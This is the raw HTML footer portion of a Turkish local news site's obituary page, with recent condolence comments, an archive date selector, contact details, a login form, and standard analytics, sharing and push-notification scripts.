<strong>Mehmet Şafak 71 yaşında</strong> <span class="en-spot en-hidden">Mehmet Şafak 71 yaşında</span></a></div></li> <li class="en-hidden"><a href="http://www.elbistaninsesi.com/vefatlar/munire-yelegen-88-yasinda-h64298.html" title="Münire Yeleğen 88 Yaşında" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/09/munire_yelegen_88_yasinda_h64298_c118f.jpg" alt="Münire Yeleğen 88 Yaşında"></a><div class="en-right"><a href="http://www.elbistaninsesi.com/vefatlar/munire-yelegen-88-yasinda-h64298.html" title="" ><span class="en-hit">4.</span> <strong>Münire Yeleğen 88 Yaşında</strong> <span class="en-spot en-hidden"> Münire Yeleğen 88 Yaşında </span></a></div></li> <li class="last en-hidden"><a href="http://www.elbistaninsesi.com/vefatlar/yasin-erden-80-yasinda-h64202.html" title="Yasin Erden 80 yaşında" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/09/yasin_erden_80_yasinda_h64202_9fe5f.jpg" alt="Yasin Erden 80 yaşında"></a><div class="en-right"><a href="http://www.elbistaninsesi.com/vefatlar/yasin-erden-80-yasinda-h64202.html" title="" ><span class="en-hit">5.</span> <strong>Yasin Erden 80 yaşında</strong> <span class="en-spot en-hidden">Yasin Erden 80 yaşında</span></a></div></li> </ul> </div> </div> </div> </div> </div> <!-- SON YORUMLAR --> <div class="sayfalar"> <div class="header"> <h5>Son Yorumlar</h5> </div> <div class="content"> <ul class="unstyled"> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/guncel/baris-pinari-harekatindan-goksuna-aci-haber-h64427.html#comment_270862" title="" >Allah rahmet eylesin mekanı cennet olsun...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/guncel/baris-pinari-harekatindan-goksuna-aci-haber-h64427.html#comment_270861" title="" >Aziz Şehidim ALLAH cc RAHMET EYLESİN MEKANIN...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/okkes-kisaca-h64429.html#comment_270860" title="" >ALLAH cc RAHMET EYLESİN MEKANI CENNET OLSUN</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/guncel/baris-pinari-harekatindan-goksuna-aci-haber-h64427.html#comment_270859" title="" >ALLAH ım rahmet eylesin mekanı cennet...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/guncel/elbistana-3u-ozellikli-bransta-4-uzman-hekim-kadrosu-h64426.html#comment_270857" title="" >Allah Mahir Beye hayırlı uzun ömürler...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/guncel/elbistanin-sultanlarindan-baskan-gurbuze-galibiyet-sozu-h64419.html#comment_270856" title="" >Mac var dediniz de gelmedik mi baskaniiim...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/guncel/elbistana-3u-ozellikli-bransta-4-uzman-hekim-kadrosu-h64426.html#comment_270855" title="" >** Zikredilen yan dallar çok önemli, hele...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/guncel/turkcell-calisanlari-a-milli-takim-formasi-giyerek-hizmet-veriyor-h64430.html#comment_270854" title="" >ak dava hak dava yaşasın milli takım</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/salih-bildirici-86-yasinda-h64407.html#comment_270853" title="" >SAYGIDEĞER KOMŞUM SALİH ABİNİN VEFÂTI...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/guncel/baris-pinari-harekatindan-goksuna-aci-haber-h64427.html#comment_270852" title="" >Allah rahmet eylesin ailesine sabırlar...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/guncel/baris-pinari-harekatindan-goksuna-aci-haber-h64427.html#comment_270851" title="" >Allah rahmet eylesin. Mekanı cennet olsun....</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/guncel/baris-pinari-harekatindan-goksuna-aci-haber-h64427.html#comment_270850" title="" >ezgi yağmur bebek Allah sabır versin kızı</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/zuleyha-unsal-53-yasinda-h64418.html#comment_270848" title="" >Merhumeye Allah’tan rahmet, yakınlarına...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/okkes-kisaca-h64429.html#comment_270847" title="" >Merhuma Allah’tan rahmet, yakınlarına...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/guncel/elbistana-3u-ozellikli-bransta-4-uzman-hekim-kadrosu-h64426.html#comment_270846" title="" >Mümkünse artık kadın doğum bölümüne...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/okkes-kisaca-h64429.html#comment_270845" title="" >ALLAH rahmet eylesin mekanı cennet olsun...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/okkes-kisaca-h64429.html#comment_270844" title="" >Allah rahmet eylesin mekanı cennet olsun</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/okkes-kisaca-h64429.html#comment_270843" title="" >Rabbim rahmeti ile muamele etsin inşAllah....</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/okkes-kisaca-h64429.html#comment_270842" title="" >Cenab-ı Hak Rahmet eylesin. Mekanı cennet...</a></li> <li class="last"><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/okkes-kisaca-h64429.html#comment_270841" title="" >ALLAH RAHMET EYLESİN</a></li> </ul> </div> </div> <!-- ARSIV --> <div class="arsiv"> <div class="header"> <h5>Arşiv</h5> </div> <div class="content"> <form action="http://www.elbistaninsesi.com/?m=arsiv" method="post" name="arsiv" > <select name="gun" class="day span1"> <option value="01" >01</option> <option value="02" >02</option> <option value="03" >03</option> <option value="04" >04</option> <option value="05" >05</option> <option value="06" >06</option> <option value="07" >07</option> <option value="08" >08</option> <option value="09" >09</option> <option value="10" >10</option> <option value="11" selected>11</option> <option value="12" >12</option> <option value="13" >13</option> <option value="14" >14</option> <option value="15" >15</option> <option value="16" >16</option> <option value="17" >17</option> <option value="18" >18</option> <option value="19" >19</option> <option value="20" >20</option> <option value="21" >21</option> <option value="22" >22</option> <option value="23" >23</option> <option value="24" >24</option> <option value="25" >25</option> <option value="26" >26</option> <option value="27" >27</option> <option value="28" >28</option> <option value="29" >29</option> <option value="30" >30</option> <option value="31" >31</option> </select> <select name="ay" class="month span1"> <option value="01" >Ocak</option> <option value="02" >Şubat</option> <option value="03" >Mart</option> <option value="04" >Nisan</option> <option value="05" >Mayıs</option> <option value="06" >Haziran</option> <option value="07" >Temmuz</option> <option value="08" >Ağustos</option> <option value="09" >Eylül</option> <option value="10" selected>Ekim</option> <option value="11" >Kasım</option> <option value="12" >Aralık</option> </select> <select name="yil" class="year span1"> <option value="2019" selected>2019</option> <option value="2018" >2018</option> <option value="2017" >2017</option> <option value="2016" >2016</option> <option value="2015" >2015</option> </select> <button type="submit" class="btn btn-default pull-right">Ara</button> </form> </div> </div> </div> </div> <!-- Sol Dikey Reklam --> <div class="reklam dikey sol" style="width:px;height:px;"> </div> <!-- Sağ Dikey Reklam --> <div class="reklam dikey sag ortala" style="width:px;height:px;"> </div> </div> <!-- FOOTER --> <div id="siteFooter" class="footer"> <div class="row-fluid"> <div class="container center"> <div class="span4"> <div>Copyright © 2019 - Tüm hakları saklıdır.<br>Elbistanın Sesi</div> <div class="footer-social"> <a href="http://facebook.com/elbistaninsesi" target="_blank" rel="nofollow"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/facebook_circle-32.png" alt="FACEBOOK"></a> <a href="http://twitter.com/elbistaninsesi" target="_blank" rel="nofollow"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/twitter_circle-32.png" alt="TWITTER"></a> <a href="https://www.instagram.com/elbistaninsesi_/" target="_blank" rel="nofollow"><img src="http://www.elbistaninsesi.com/images/ins-ico.png" width="32" height="32" /> <img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/google_circle-32.png" alt="GOOGLE PLUS"></a> <a href="http://www.elbistaninsesi.com/rss"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/rss_circle-32.png" alt="RSS"></a> </div> </div> <div class="span4 text-center"> <div class="footer-logo"><a href="http://www.elbistaninsesi.com/" class="logo"><img src="http://www.elbistaninsesi.com/images/banner/Ysimsiz-1_1.jpg" alt="Ökkeş Kısaca" /></a></div> </div> <div class="span4"> <p><center> 0 (344) 415 04 15 <br> gazete@elbistaninsesi.com <br>Kızılcaoba Mah. Kışla Cad. 19/1</center> </p> <p class="site-info glyphicons earphone">0 (344) 415 04 15</p> </div> </div> </div> <div id="footer-alt" class="row-fluid"> <div class="container center"> <div class="span3"> <div class="footer-alt-link"><a href="http://www.elbistaninsesi.com/m/" class="footer-alt-mobil glyphicons iphone"><strong>Mobil</strong>Mobil siteyi görüntüleyin.</a></div> </div> <div class="span3"> <div class="footer-alt-link"><a href="http://www.elbistaninsesi.com/kunye.html" class="footer-alt-reklam glyphicons global"><strong>Künye</strong>Künyeyi görüntüleyin.</a></div> </div> <div class="span3"> <div class="footer-alt-link"><a href="http://www.elbistaninsesi.com/iletisim.html" class="footer-alt-iletisim glyphicons headset"><strong>İletişim</strong>Bize ulaşın.</a></div> </div> <div class="span3"> <div class="footer-alt-link"><a href="#" class="footer-alt-iletisim glyphicons embed_close"><strong>Sitene Ekle</strong>Güncel haberleri ekleyin.</a></div> </div> </div> </div> <div class="row-fluid"> <div class="container center"> <div class="span12 text-center"> <p>Bu sitede yayınlanan tüm materyalin her hakkı mahfuzdur. Kaynak gösterilse bile gazetemizin izni olmadan yayınlanamaz.</p> <p><a href="http://www.haber-sistemi.com" title="Haber Scripti">Haber Scripti</a> | <a href="http://www.tebilisim.com" title="TE Bilişim" target="_blank">TE Bilişim<br> </div> </div> </div> <div id="top" class="btn btn-inverse">Yukarı Çık</div> </div> <div id="uye" class="user modal hide fade" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true"> <div class="modal-header"> <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button> <h3 id="myModalLabel">Üye Girişi</h3> </div> <div class="modal-body"> <form class="form-horizontal" action="http://www.elbistaninsesi.com/index.php?m=login&rd=http%3A%2F%2Fwww.elbistaninsesi.com%2Fvefatlar%2Fokkes-kisaca-h64429.html" method="post"> <div class="control-group"> <label class="control-label" for="inputName">Kullanıcı Adı</label> <div class="controls"> <input id="inputName" value="" name="kullanici" type="text" placeholder="Kullanıcı Adı" required> </div> </div> <div class="control-group"> <label class="control-label" for="inputPassword">Şifre</label> <div class="controls"> <input type="password" value="" name="sifre" id="inputPassword" placeholder="Şifre" required> </div> </div> <div class="control-group"> <div class="controls"> <button type="submit" class="btn btn-info">Giriş Yap</button> </div> </div> </form> </div> <div class="modal-footer"> <a href="http://www.elbistaninsesi.com/uyelik.html" class="pull-left btn">Üye Ol</a> <a href="http://www.elbistaninsesi.com/unuttum.html" class="pull-left btn">Şifremi unuttum?</a> <button class="btn btn-danger" data-dismiss="modal" aria-hidden="true">Kapat</button> </div> </div> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery-1.9.1.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/modernizr.custom.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/classie.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/uisearch.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/login.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.showbizpro.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.cookie.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.mousewheel.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.scrollbar.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.cycle.all.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/base.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/waypoints.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/sticky.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/comments.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.pKisalt.min.js"></script><script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/getshares.min.js"></script><script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/moment.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/moment-tr.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.elevateZoom-3.0.8.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/system-min.js"></script> <script type="text/javascript">	new UISearch( document.getElementById( 'sb-search' ) );	$(function(){	});	$("#comment_list .text").pKisalt();	var gsTitle = document.querySelectorAll(".gs-title")[0].innerHTML;	var gsSpace = ' ';	var gsUrl = location.href;	new GetShare({ root: $(".gs-facebook"), network: "facebook", share: { }	});	new GetShare({ root: $(".gs-twitter"), network: "twitter", share: { message:gsTitle+gsSpace+gsUrl }	});	new GetShare({ root: $(".gs-google"), network: "googleplus", share: { }	});	new GetShare({ root: $(".gs-linkedin"), network: "linkedin", share: { }	});	jQuery('#anasayfayazar').showbizpro({	allEntryAtOnce:"on",	dragAndScroll:"off",	visibleElementsArray:[4,4,4,4],	carousel:"off",	heightOffsetBottom:0,	rewindFromEnd:"off",	autoPlay:"off",	delay:4000,	speed:750	});	jQuery('#gununmansetleri').showbizpro({	allEntryAtOnce:"on",	dragAndScroll:"off",	visibleElementsArray:[6,6,6,6],	carousel:"off",	heightOffsetBottom:0,	rewindFromEnd:"off",	autoPlay:"on",	delay:4000,	speed:750	});	$('#haber > .page-header').waypoint(function(direction) { $('#article-finished').toggleClass('hiding', direction === "up");	}, { offset: function() { return $.waypoints('viewportHeight') - $(this).height() - 750; }	});	function addLink() { var kisa_site_adi = "Elbistanın Sesi"; var kopyala_imza_onu = "Kaynak: http://www.elbistaninsesi.com"; var body_element = document.getElementsByTagName('body')[0]; var selection; selection = window.getSelection(); var pagelink = "<br><br>" + kopyala_imza_onu + "<a href='"+document.location.href+"'>"+document.location.href+"</a><br><br>" + kisa_site_adi; var copytext = selection + pagelink; var newdiv = document.createElement('div'); newdiv.style.position='absolute'; newdiv.style.left='-99999px'; body_element.appendChild(newdiv); newdiv.innerHTML = copytext; selection.selectAllChildren(newdiv); window.setTimeout(function() { body_element.removeChild(newdiv); },0);	}	document.oncopy = addLink;	tebilisim('64429', 'haber', ''); </script> <!-- Google Analytics --> <script> (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','//www.google-analytics.com/analytics.js','ga'); ga('create', analitik_ga, 'auto'); ga('send', 'pageview'); </script> <!-- End Google Analytics --> <script src="https://cdn.onesignal.com/sdks/OneSignalSDK.js" async='async'></script> <script> var OneSignal = window.OneSignal || [];	OneSignal.push(["init", {	appId: "51fe1034-635b-4e70-859b-1fc8dff5f28d",	autoRegister: true,	subdomainName: 'elbistaninsesi',	setDefaultNotificationUrl: 'http://www.elbistaninsesi.com/',	notifyButton: { enable: false	},	/*	welcomeNotification: { "title": "Hoş geldiniz", "message": "Bildirimlerimize üye olduğunuz teşekkür ederiz.",	},	*/ promptOptions: { actionMessage: "Sondakika haberlerimizi anında öğrenebilmek için bildirimleri kabul edin!", acceptButtonText: "ABONE OL", cancelButtonText: "İSTEMİYORUM", autoAcceptTitle: '"İzin ver" butonuna tıklayın', exampleNotificationCaption: '(istediğin zaman aboneliğini iptal edebilirsin)', } }]); </script> </body> </html> 